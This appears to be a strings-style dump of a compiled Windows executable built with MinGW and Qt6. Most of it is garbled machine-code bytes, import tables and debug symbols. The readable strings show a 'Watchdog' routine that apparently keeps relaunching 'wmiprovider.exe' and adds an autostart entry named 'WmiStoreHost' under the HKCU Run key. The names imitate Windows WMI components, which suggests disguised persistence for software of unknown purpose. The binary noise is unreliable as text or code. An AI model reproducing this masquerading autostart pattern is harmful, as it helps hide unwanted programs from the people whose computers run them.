L?!This program cannot be run in DOS mode.
`.data
?.rdata
@.pdata
@.xdata
?.idata
?.reloc
H??(H?
f?8MZu
tP1?H??(???
?{??????
???i???
1?H??(?
?@???D???
???,???f?H??8H?
H?D$ ??
?H??8?
ATUWVSH?? H?
??H???H
?3H??u?H?5?C
1????X
????H?
Hc?H??
??H?-?}
H??H??
H9?u?L
??tsH?? [^_]A\?
??????
?????H?
?????1?H?
?????f
H?? [^_]A\?f.
?7???f?H???????????
?H??(H?
???????H??(?
H??(H?
?z?????H??(?
H??(??
?H??(?????????????H?
??????????????????ff.
?VSH??(H??H??H??t?H?
H????u
H??H??([^?
H??H??H??([^H?%]?
1???ff.
?H?%9?
?????????ATUWVSH???
H?D$(H?l$ H??H?D$ 
H????H???
??H??$?
@??t.H???
[^_]A\?f?H??$?
@??u?L?d$`H?t$8L???
L??H???
H??H??H?D$ 
H?D$(??H?|$@I??H??H???
H?D$`H??t
)D$`I??
L??H??H??$?
H?D$`H??td??(
u^H?D$pH?\$hH?=??
@H?4?H9?t.
H9?u?H?L$`A?
??H??$?
H??t"??(
H?D$@H??
?Z?????(
?P???H?L$@A?
[^_]A\?
H?L$`A?
???L??H????
H??H???,
H??L???
H??H???
??H??H????
H????H????ff.
WVSH???H???
1?H??H??
????? 
H?D$`H?
H?D$p?i
I??H?P
L?D$pH??H?D$(H?D$`H?D$8
H?T$@H???D$0
H?D$ ?
?H???[^_?H???
H??H???
?AWAVAUATUWVSH??
H?l$`H??$?
L?t$@L?-K?
L??H?D$@?
H?D$HA??H?|$PE1?E1?H??H???
H??L???
L??H?D$@
L?|$HH??A??L??H???
L?|$ H?T$ H??H?D$(
H?T$0I??H??H?D$8
H?D$0?
tOH???
H?D$`H??t
[^_]A\A]A^A_?f?H?L$`A?
?`???f?H??$?
?)???f?H??$?
???H??H???
H??H???;
H????H????I??H???
L??L???
??H??????H????ff.
?SH?? H???
???H?K
H??H?? [?????????????????VSH???
H?t$`H?
H??H?T$0H?D$8?
H??H???
H?T$@H?P
H?T$HH?P
H?D$`H?T$PH??t
H?L$`A?
H?\$@H???
I??1?1??
H?T$@H??H?
?2?????*
?(????D$/H?L$@A?
???H??H????
H??H????
?f?VSH??xH?
H?t$PH??H?D$ 
H?T$ H??H?D$(?
H??H???
H?T$0H?P
H?T$8H?P
H?D$PH?T$@H??t
trH?\$0H???
I??1??
H??H??tl?
H?D$0H??t
??H??x[^?
H?L$0A?
??H??x[^??H?L$PA?
1???H??H???a
H??H???N
???????%B?
???%2?
???%"?
???%??
???%??
???%??
???%??
???%??
???%??
???%??
???%??
???%r?
???%b?
???%R?
???%B?
???%*?
???%??
???%??
???%??
???%??
???%??
???%??
???%??
???%??
???%z?
???%j?
???%R?
???%B?
???%2?
???%"?
???%??
???%??
???%??
???%??
???%??
???%??
???%??
H??(H?
H??u?H??(?f
VSH??(H?
?????t9??t ????
?H)?H?t??
H9?u?H?
~???H??([^?????
??J?<?
L??u???f
?q????1???????????????H??(??
H??(?f
H??(??VSH??(H?
H??([^?f?H?
H9?u??
H??([^?f
H??([^?ff.
1???????????????VSH??x
)D$`?9
D$0I??I???
|$(H???
(t$@1?
(D$`H??x[^??H?
?S???H?
?G???????????????????????????VSH??8H?D$XH???
H?T$XL?D$`L?L$hH?D$(??
H?t$(?
H??H??I???
WVSH??PHc5?m
E1?H??
H??(A9?u?H????
H??H??
?H?x ?
H?T$ H?L
?D$D?P????t
?P????u
H??P[^_?
H?L$ D
D?H?T$8H
I??H?K
???d???
1??!???H?
?>???H?
H???/????ff.
UAWAVAUATWVSH??HH?l$@?=
[^_A\A]A^A_]??
H?????
H)?H?D$0H?
L??H)?H??
?\???L?%?/
?????]f.
???H)?L
L???m???A?6H??
??? L?
??H)?L
L??H??
?????L9?fA?6
?Q???H?5?~
L?e?1?
M??H?H
H??(;=
?t???H??
?^???f
I?6H)?L
ufH??xaH?t$ H?
M???????
A?6???
??yKI?
L9?~??????H9?
?L???????A?6?k???
L???????I?6?V???H)?L
???t???
??????????
??????
???L?5p-
&H???W???L9?D?&r??z???H?
?????H?
???????H??XH?
?L$ H?L$ H?T$(
D$@???H??X?f?H?
????SH?? H?
H????????? ??CCG 
s?????
?u41??
???????H?? [?=
H??t%H??H?? [H??f.
?W?????
1?H?? [?
H??t??
?_???f?1??
?T????
???6????
?"????
??????????????????ATUWVSH?? L?%
H??t6H?-;{
??H??????u
H????H?[
H??u?L??H?? [^_]A\H?%?z
WVSH?? ?
????H??u
1?H?? [^_??
H??H??t3H?p
?8H???
????????VSH??(?
1?H??([^?
H??t'1??
H??H??t
u?H??t
1?H??([^?
SH?? ??
w0??tL?
H?? [?f
??t??<?????f.
H??H?[
H??u?H?
?l?????????
H?? [????????f
?0?????????????????1?f?9MZu
fE??H?D
t2A?H?H?
?L?L?(
L9?L??r
H??(L9?u?1??WVSH?? H???1
1?f?:MZuYHcB<H
f??tB?B?H?
?H?|?(?
H??(H9?t'A?
H??H????
??u?H??H?? [^_?
1?H??H?? [^_?
1?f?:MZu
?A?8PE
H)?I?D
fE??t4A?P?H?
?L?L?(f.
L9?L??r
H9?r?H??(L9?u?1??H?
1?f?8MZu
1?fA?8MZu
fE??H?D
t,A?P?H?
?H?T?(
H??t?H??
H??(H9?u?1??ff.
1?f?8MZu
D?H???f.
1?f?:MZu
?A?8PE
fE??I?T
t?A?A?H?
?L?L?(f.
L9?L??r
H??(I9?u?1???B$????
E1?fA?;MZu
?A?8PE
L???f.
u?A???
fE??I?T
t?E?B?O?
?N?T?(f.
L9?M??r
H??(L9?u?E1?L???
??t???
?L??????????????%
???%?t
???%?t
???%?t
???%?t
???%?t
???%?t
???%?t
???%?t
???%zt
???%jt
???%Zt
???%Jt
???%:t
???%?u
???%?u
???%ru
??QPH=
w?H)?H?
XY???????????????H?
??????H?
??????H?
??????SH?? ???
?H?? [???%?s
???%?s
???%?s
???%?s
???%?s
???%?s
?????????UWVSH??(H?
H??H??tm??(
@H?<?H9?t*
H9?u?H?
H??H??([^_]H??
H??([^_]????????H?
???????????VSH??81?H??H??H??t
?????H??
H?D$ H?T$ H??H?\$(?
?H??8[^????????????SH?? H?
H??H?? [?I????????????SH?? H?
H??H?? [H?%?p
???????H??H?T$(??
??u)H??t$? 
?????f
???????H?
?????????H??1????????????H?
H??H?`
??????WVSH??P?L$pH?|$ H???
???H?T$pI??H??H?\$0A?
H???M???H???
H???-???H???
H???????H?
???H???
???H???????1?H???????H????????
H?L$@??H?
H?D$0?
??H??P[^_?H???'H?L$@H??H?
H?D$0?
H???G???H??H???4????????????????????????????????????????????????5
????????
????????
Watchdog
WMI Store
Microsoft
WmiStHost
WmiPrvHost
wmiprovider.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WmiStoreHost
Local\
Argument domain error (DOMAIN)
Argument singularity (SIGN)
Overflow range error (OVERFLOW)
Partial loss of significance (PLOSS)
Total loss of significance (TLOSS)
The result is too small to be represented (UNDERFLOW)
Unknown error
_matherr(): %s in %s(%g, %g)  (retval=%g)
????L???????l???|???????\???Mingw-w64 runtime failure:
Address %p has no image-section
  VirtualQuery failed for %d bytes at address %p
  VirtualProtect failed with code 0x%x
  Unknown pseudo relocation protocol version %d.
  Unknown pseudo relocation bit size %d.
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
????????????????????]???????????]???;???
Watchdog
7QObject
8Watchdog
GCC: (x86_64-posix-seh-rev1, Built by MinGW-Builds project) 13.1.0
GCC: (x86_64-posix-seh-rev1, Built by MinGW-Builds project) 13.1.0
GCC: (x86_64-posix-seh-rev1, Built by MinGW-Builds project) 13.1.0
GCC: (x86_64-posix-seh-rev1, Built by MinGW-Builds project) 13.1.0
_ZN10QArrayData10deallocateEPS_xx
_ZN11QMetaObject10ConnectionD1Ev
_ZN16QCoreApplication18applicationDirPathEv
_ZN16QCoreApplication18setApplicationNameERK7QString
_ZN16QCoreApplication19applicationFilePathEv
_ZN16QCoreApplication19setOrganizationNameERK7QString
_ZN16QCoreApplication4execEv
_ZN16QCoreApplicationC1ERiPPci
_ZN16QCoreApplicationD1Ev
_ZN4QDir18toNativeSeparatorsERK7QString
_ZN4QDirC1ERK7QString
_ZN4QDirD1Ev
_ZN6QTimer11setIntervalEi
_ZN6QTimer16staticMetaObjectE
_ZN6QTimer5startEv
_ZN6QTimer7timeoutENS_14QPrivateSignalE
_ZN6QTimerC1EP7QObject
_ZN6QTimerD1Ev
_ZN7QObject10childEventEP11QChildEvent
_ZN7QObject10timerEventEP11QTimerEvent
_ZN7QObject11connectImplEPKS_PPvS1_S3_PN9QtPrivate15QSlotObjectBaseEN2Qt14ConnectionTypeEPKiPK11QMetaObject
_ZN7QObject11customEventEP6QEvent
_ZN7QObject11eventFilterEPS_P6QEvent
_ZN7QObject11qt_metacallEN11QMetaObject4CallEiPPv
_ZN7QObject11qt_metacastEPKc
_ZN7QObject13connectNotifyERK11QMetaMethod
_ZN7QObject16disconnectNotifyERK11QMetaMethod
_ZN7QObject16staticMetaObjectE
_ZN7QObject5eventEP6QEvent
_ZN7QObjectC2EPS_
_ZN7QObjectD2Ev
_ZN7QString6appendE20QBasicUtf8StringViewILb0EE
_ZN7QString6appendERKS_
_ZN7QString8fromUtf8E14QByteArrayView
_ZN8QProcess13startDetachedERK7QStringRK5QListIS0_ES2_Px
_ZN8QVariantC1ERK7QString
_ZN8QVariantD1Ev
_ZN9QFileInfo6existsERK7QString
_ZN9QSettings8setValueE14QAnyStringViewRK8QVariant
_ZN9QSettingsC1ERK7QStringNS_6FormatEP7QObject
_ZN9QSettingsD1Ev
_ZNK11QObjectData17dynamicMetaObjectEv
_ZNK4QDir8filePathERK7QString
_ZNK7QString5utf16Ev
qt_version_tag_6_11
_Unwind_Resume
CloseHandle
CreateMutexW
DeleteCriticalSection
EnterCriticalSection
GetLastError
InitializeCriticalSection
LeaveCriticalSection
OpenMutexW
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
__C_specific_handler
__getmainargs
__initenv
__iob_func
__set_app_type
__setusermatherr
_amsg_exit
_cexit
_commode
_fmode
_initterm
_onexit
calloc
fprintf
fwrite
malloc
memcpy
signal
strcmp
strlen
strncmp
vfprintf
_ZTVN10__cxxabiv117__class_type_infoE
_ZTVN10__cxxabiv120__si_class_type_infoE
_ZdlPvy
__gxx_personality_seh0
Qt6Core.dll
libgcc_s_seh-1.dll
KERNEL32.dll
msvcrt.dll
libstdc++-6.dll
?P?`?p?x???????????
? ?0?@?`?????????????????????
? ?0?@?P?`?p?????????????????
? ?0?@?P?p?x?????????????????????
? ?8?@?
GNU C17 13.1.0 -mtune=core2 -march=nocona -g -g -g -O2 -O2 -O2 -fno-ident -fPIC -fbuilding-libgcc -fno-stack-protector
long long unsigned int
long long int
short unsigned int
long int
unsigned int
long unsigned int
unsigned char
long double
double
short int
ix86_tune_indices
X86_TUNE_SCHEDULE
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_FP_CONVERTS_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_CONVERTS_DEPENDENCY
X86_TUNE_DEST_FALSE_DEP_FOR_GLC
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_MOVX
X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_FUSE_CMP_AND_BRANCH_32
X86_TUNE_FUSE_CMP_AND_BRANCH_64
X86_TUNE_FUSE_CMP_AND_BRANCH_SOFLAGS
X86_TUNE_FUSE_ALU_AND_BRANCH
X86_TUNE_ACCUMULATE_OUTGOING_ARGS
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_PAD_RETURNS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_LCP_STALL
X86_TUNE_READ_MODIFY
X86_TUNE_USE_INCDEC
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_OPT_AGU
X86_TUNE_AVOID_LEA_FOR_ADDR
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_PREFER_KNOWN_REP_MOVSB_STOSB
X86_TUNE_MISALIGNED_MOVE_STRING_PRO_EPILOGUES
X86_TUNE_USE_SAHF
X86_TUNE_USE_CLTD
X86_TUNE_USE_BT
X86_TUNE_AVOID_FALSE_DEP_FOR_BMI
X86_TUNE_ADJUST_UNROLL
X86_TUNE_ONE_IF_CONV_INSN
X86_TUNE_AVOID_MFENCE
X86_TUNE_EXPAND_ABS
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_FFREEP
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
X86_TUNE_INTER_UNIT_MOVES_TO_VEC
X86_TUNE_INTER_UNIT_MOVES_FROM_VEC
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_SPLIT_MEM_OPND_FOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_SLOW_PSHUFB
X86_TUNE_AVOID_4BYTE_PREFIXES
X86_TUNE_USE_GATHER_2PARTS
X86_TUNE_USE_SCATTER_2PARTS
X86_TUNE_USE_GATHER_4PARTS
X86_TUNE_USE_SCATTER_4PARTS
X86_TUNE_USE_GATHER
X86_TUNE_USE_SCATTER
X86_TUNE_AVOID_128FMA_CHAINS
X86_TUNE_AVOID_256FMA_CHAINS
X86_TUNE_AVOID_512FMA_CHAINS
X86_TUNE_V2DF_REDUCTION_PREFER_HADDPD
X86_TUNE_AVX256_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_AVX256_UNALIGNED_STORE_OPTIMAL
X86_TUNE_AVX256_SPLIT_REGS
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_AVX256_OPTIMAL
X86_TUNE_AVX512_SPLIT_REGS
X86_TUNE_AVX256_MOVE_BY_PIECES
X86_TUNE_AVX256_STORE_BY_PIECES
X86_TUNE_AVX512_MOVE_BY_PIECES
X86_TUNE_AVX512_STORE_BY_PIECES
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_ALWAYS_FANCY_MATH_387
X86_TUNE_UNROLL_STRLEN
X86_TUNE_SHIFT1
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_FAST_PREFIX
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_HIMODE_MATH
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_USE_XCHGB
X86_TUNE_USE_MOV0
X86_TUNE_NOT_VECTORMODE
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_QIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_EMIT_VZEROUPPER
X86_TUNE_LAST
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
signed char
__int128
__int128 unsigned
_Float16
complex _Float16
complex float
complex double
complex long double
_Float128
complex _Float128
func_ptr
__CTOR_LIST__
__DTOR_LIST__
""gY0uKgg0=L""
C:/buildroot/src/gcc-13.1.0/libgcc/config/i386\cygwin.S
C:\buildroot\x86_64-1310-posix-seh-msvcrt-rt_v11-rev1\build\gcc-13.1.0\x86_64-w64-mingw32\libgcc
GNU AS 2.39
C:\buildroot\x86_64-1310-posix-seh-msvcrt-rt_v11-rev1\build\gcc-13.1.0\x86_64-w64-mingw32\libgcc
C:/buildroot/src/gcc-13.1.0/libgcc/config/i386
cygwin.S
C:\buildroot\x86_64-1310-posix-seh-msvcrt-rt_v11-rev1\build\gcc-13.1.0\x86_64-w64-mingw32\libgcc
C:/buildroot/src/gcc-13.1.0/libgcc/libgcc2.c
C:/buildroot/x86_64-1310-posix-seh-msvcrt-rt_v11-rev1/build/gcc-13.1.0/x86_64-w64-mingw32/libgcc
C:/buildroot/src/gcc-13.1.0/libgcc
C:/buildroot/src/gcc-13.1.0/gcc/config/i386
libgcc2.c
i386.h
gbl-ctors.h
libgcc2.c
crtexe.c
mainret
.l_endw
.l_start?
.l_end
atexit
.xdata
.pdata
cygming-crtbeg
.xdata
.pdata
.xdata
.pdata
.rdata
main.cpp
.rdata
watchdog.cpp
.rdata
.xdata
.pdata
.rdata
.xdata
.pdata
.idata$7t
.idata$5?
.idata$4?
.idata$6?
.idata$7p
.idata$5?
.idata$4?
.idata$6?
.idata$7l
.idata$5?
.idata$4?
.idata$6?
.idata$7h
.idata$5?
.idata$4?
.idata$6?
.idata$7d
.idata$5?
.idata$4?
.idata$6|
.idata$7`
.idata$5?
.idata$4?
.idata$6H
.idata$7\
.idata$5?
.idata$4?
.idata$6
.idata$7X
.idata$5?
.idata$4?
.idata$6?
.idata$7T
.idata$5?
.idata$4?
.idata$6?
.idata$7P
.idata$5?
.idata$4?
.idata$6?
.idata$7L
.idata$5x
.idata$4?
.idata$6?
.idata$7H
.idata$5p
.idata$4?
.idata$6X
.idata$7D
.idata$5h
.idata$4x
.idata$6<
.idata$7@
.idata$5`
.idata$4p
.idata$6
.idata$7<
.idata$5X
.idata$4h
.idata$6?
.idata$78
.idata$5P
.idata$4`
.idata$6?
.idata$74
.idata$5H
.idata$4X
.idata$6?
.idata$70
.idata$5@
.idata$4P
.idata$6?
.idata$7,
.idata$58
.idata$4H
.idata$6l
.idata$7(
.idata$50
.idata$4@
.idata$6<
.idata$7$
.idata$5(
.idata$48
.idata$6
.idata$7 
.idata$5 
.idata$40
.idata$6?
.idata$7
.idata$5
.idata$4(
.idata$6?
.idata$7
.idata$5
.idata$4 
.idata$6?
.idata$7
.idata$5
.idata$4
.idata$6,
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5?
.idata$4
.idata$6?
.idata$7
.idata$5?
.idata$4
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6x
.idata$7?
.idata$5?
.idata$4?
.idata$6`
.idata$7?
.idata$5?
.idata$4?
.idata$6@
.idata$7?
.idata$5?
.idata$4?
.idata$6$
.idata$7?
.idata$5?
.idata$4?
.idata$6
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7?
.idata$5?
.idata$4?
.idata$6p
.idata$7?
.idata$5?
.idata$4?
.idata$68
.idata$7?
.idata$5?
.idata$4?
.idata$6
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7?
.idata$5x
.idata$4?
.idata$6?
.idata$7?
.idata$5p
.idata$4?
.idata$6|
.idata$7?
.idata$5h
.idata$4x
.idata$6X
gccmain.c
__main
.xdata
.pdata
natstart.c
wildcard.c
dllargv.c
_setargv?
.xdata
.pdata
_newmode.c
tlssup.c
__xd_a
__xd_z
.xdata
.pdata
.CRT$XLD@
.CRT$XLC8
.rdata
.CRT$XDZX
.CRT$XDAP
.CRT$XLZH
.CRT$XLA0
.tls$ZZZ
xncommod.c
cinitexe.c
.CRT$XCZ
.CRT$XCA
.CRT$XIZ(
.CRT$XIA
merr.c
_matherr?
.rdata
.xdata
.pdata
CRT_fp10.c
_fpreset?
fpreset
.xdata
.pdata
mingw_helpers.
pseudo-reloc.c
the_secs?
.rdata
.xdata
.pdata
usermatherr.c
.xdata
.pdata
xtxtmode.c
crt_handler.c
.xdata
.rdata
.pdata
tlsthrd.c
.xdata
.pdata
tlsmcrt.c
pesect.c
.xdata
.pdata
.idata$7?
.idata$5P
.idata$4`
.idata$6
.idata$7?
.idata$5H
.idata$4X
.idata$6
.idata$7?
.idata$5@
.idata$4P
.idata$6?
.idata$7?
.idata$58
.idata$4H
.idata$6?
.idata$7?
.idata$50
.idata$4@
.idata$6?
.idata$7?
.idata$5(
.idata$48
.idata$6?
.idata$7?
.idata$5 
.idata$40
.idata$6?
.idata$7?
.idata$5
.idata$4(
.idata$6?
.idata$7?
.idata$5
.idata$4 
.idata$6~
.idata$7?
.idata$5
.idata$4
.idata$6n
.idata$7?
.idata$5
.idata$4
.idata$6V
.idata$7?
.idata$5?
.idata$4
.idata$6>
.idata$7?
.idata$5?
.idata$4
.idata$6.
.idata$7?
.idata$5?
.idata$4?
.idata$6 
fthunk
.idata$2(
.idata$4?
.idata$5?
.idata$4h
.idata$5X
.idata$7?
.idata$7`
.idata$5H
.idata$4X
.idata$6?
.idata$7\
.idata$5@
.idata$4P
.idata$6?
.idata$7X
.idata$58
.idata$4H
.idata$6?
.idata$7T
.idata$50
.idata$4@
.idata$6h
.idata$7P
.idata$5(
.idata$48
.idata$6@
.idata$7?
.idata$5?
.idata$4?
.idata$6
libgcc2.c
mingw_matherr.
__p__fmode.c
.xdata
.pdata
__p__commode.c
.xdata
.pdata
handler
.xdata
.pdata
acrt_iob_func.
.xdata
.pdata
.idata$7?
.idata$5`
.idata$4p
.idata$6.
.idata$7?
.idata$5h
.idata$4x
.idata$6>
.idata$7?
.idata$5p
.idata$4?
.idata$6J
.idata$7?
.idata$5x
.idata$4?
.idata$6X
.idata$7?
.idata$5?
.idata$4?
.idata$6j
.idata$7?
.idata$5?
.idata$4?
.idata$6~
.idata$7?
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7
.idata$5?
.idata$4?
.idata$6?
.idata$7 
.idata$5?
.idata$4?
.idata$6?
.idata$7$
.idata$5?
.idata$4?
.idata$6?
.idata$7(
.idata$5?
.idata$4?
.idata$6?
.idata$7,
.idata$5?
.idata$4
.idata$6
.idata$70
.idata$5?
.idata$4
.idata$6
.idata$74
.idata$5
.idata$4
.idata$6
.idata$78
.idata$5
.idata$4
.idata$6 
.idata$7<
.idata$5
.idata$4 
.idata$6*
.idata$7@
.idata$5
.idata$4(
.idata$64
fthunk
.idata$2<
.idata$4p
.idata$5`
.idata$40
.idata$5 
.idata$7D
cygming-crtend
.rdata
.idata$2
.idata$5h
.idata$4x
.idata$2
.idata$5?
.idata$4?
.idata$2P
.idata$5(
.idata$48
.idata$4?
.idata$5?
.idata$7x
.idata$4?
.idata$5?
.idata$7?
.idata$4`
.idata$5P
.idata$7d
__xc_z
_ZdlPvy
__xl_a
_cexit
__xl_d
_tls_end
memcpy
malloc
_CRT_MT
__dll__
calloc
fprintf
_commode?
__xi_z
signal
strncmp
__xl_z
__end__
strcmp
__xi_a
__xc_a
_fmode
__xl_c
_newmode`
fwrite
_onexit
strlen
vfprintf
.qtversion
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_str
.debug_line_str
__mingw_invalidParameterHandler
pre_c_init
.rdata$.refptr.__mingw_initltsdrot_force
.rdata$.refptr.__mingw_initltsdyn_force
.rdata$.refptr.__mingw_initltssuo_force
.rdata$.refptr.__image_base__
.rdata$.refptr.__mingw_app_type
managedapp
.rdata$.refptr._fmode
.rdata$.refptr._commode
.rdata$.refptr._MINGW_INSTALL_DEBUG_MATHERR
.rdata$.refptr._matherr
pre_cpp_init
.rdata$.refptr._newmode
startinfo
.rdata$.refptr._dowildcard
__tmainCRTStartup
.rdata$.refptr.__native_startup_lock
.rdata$.refptr.__native_startup_state
has_cctor
.rdata$.refptr.__dyn_tls_init_callback
.rdata$.refptr._gnu_exception_handler
.rdata$.refptr.__mingw_oldexcpt_handler
.rdata$.refptr.__imp___initenv
.rdata$.refptr.__xc_z
.rdata$.refptr.__xc_a
.rdata$.refptr.__xi_z
.rdata$.refptr.__xi_a
WinMainCRTStartup
.l_startw
mainCRTStartup
.CRT$XCAA
.CRT$XIAA
__gcc_register_frame
__gcc_deregister_frame
.text$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE7getDtorEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE7getDtorEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
_ZN8Watchdog18qt_static_metacallEP7QObjectN11QMetaObject4CallEiPPv
.text$_ZN9QtPrivate17MetaObjectForTypeI8WatchdogvE18metaObjectFunctionEPKNS_18QMetaTypeInterfaceE
_ZN9QtPrivate17MetaObjectForTypeI8WatchdogvE18metaObjectFunctionEPKNS_18QMetaTypeInterfaceE
.text$_ZN11QMetaObject16staticMetaObjectIL_ZN7QObject16staticMetaObjectEEEEPKS_v
_ZN11QMetaObject16staticMetaObjectIL_ZN7QObject16staticMetaObjectEEEEPKS_v
.text$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE13getDefaultCtrEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE13getDefaultCtrEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
_ZNK8Watchdog10metaObjectEv
.text$_ZN8WatchdogD1Ev
_ZN8WatchdogD1Ev
.rdata$_ZTV8Watchdog
.text$_ZN8WatchdogD0Ev
_ZN8WatchdogD0Ev
_ZN8Watchdog11qt_metacastEPKc
_ZN8Watchdog32qt_staticMetaObjectStaticContentIN12_GLOBAL__N_126qt_meta_tag_ZN8WatchdogE_tEEE
_ZN8Watchdog11qt_metacallEN11QMetaObject4CallEiPPv
.rdata$_ZTS7QObject
.rdata$_ZTI7QObject
.rdata$_ZTS8Watchdog
.rdata$_ZTI8Watchdog
_ZN8Watchdog36qt_staticMetaObjectRelocatingContentIN12_GLOBAL__N_126qt_meta_tag_ZN8WatchdogE_tEEE
.data$_ZN9QtPrivate25QMetaTypeInterfaceWrapperI8WatchdogE8metaTypeE
.rdata$_ZN9QtPrivate16QMetaTypeForTypeI8WatchdogE4nameE
.qtversion
.xdata$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE7getDtorEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
.pdata$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE7getDtorEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
.xdata$_ZN9QtPrivate17MetaObjectForTypeI8WatchdogvE18metaObjectFunctionEPKNS_18QMetaTypeInterfaceE
.pdata$_ZN9QtPrivate17MetaObjectForTypeI8WatchdogvE18metaObjectFunctionEPKNS_18QMetaTypeInterfaceE
.xdata$_ZN11QMetaObject16staticMetaObjectIL_ZN7QObject16staticMetaObjectEEEEPKS_v
.pdata$_ZN11QMetaObject16staticMetaObjectIL_ZN7QObject16staticMetaObjectEEEEPKS_v
.xdata$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE13getDefaultCtrEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
.pdata$_ZZN9QtPrivate16QMetaTypeForTypeI8WatchdogE13getDefaultCtrEvENUlPKNS_18QMetaTypeInterfaceEPvE_4_FUNES5_S6_
.xdata$_ZN8WatchdogD1Ev
.pdata$_ZN8WatchdogD1Ev
.xdata$_ZN8WatchdogD0Ev
.pdata$_ZN8WatchdogD0Ev
.rdata$zzz
mocs_compilation.cpp
.text$_ZN7QStringC1EPKc
_ZN7QStringC1EPKc
.text$_ZN17QArrayDataPointerIDsED1Ev
_ZN17QArrayDataPointerIDsED1Ev
.rdata$.refptr._ZTV8Watchdog
.xdata$_ZN7QStringC1EPKc
.pdata$_ZN7QStringC1EPKc
.xdata$_ZN17QArrayDataPointerIDsED1Ev
.pdata$_ZN17QArrayDataPointerIDsED1Ev
.text.startup
.xdata.startup
.pdata.startup
.text$_ZN9QtPrivate15QCallableObjectIM8WatchdogFvvENS_4ListIJEEEvE4implEiPNS_15QSlotObjectBaseEP7QObjectPPvPb
_ZN9QtPrivate15QCallableObjectIM8WatchdogFvvENS_4ListIJEEEvE4implEiPNS_15QSlotObjectBaseEP7QObjectPPvPb
.text$_ZN17QArrayDataPointerI7QStringED1Ev
_ZN17QArrayDataPointerI7QStringED1Ev
_ZN8Watchdog5checkEv
_ZN8WatchdogC2EP7QObject
_ZN8WatchdogC1EP7QObject
_ZN8Watchdog14setupAutoStartEv
_ZN8Watchdog5startEv
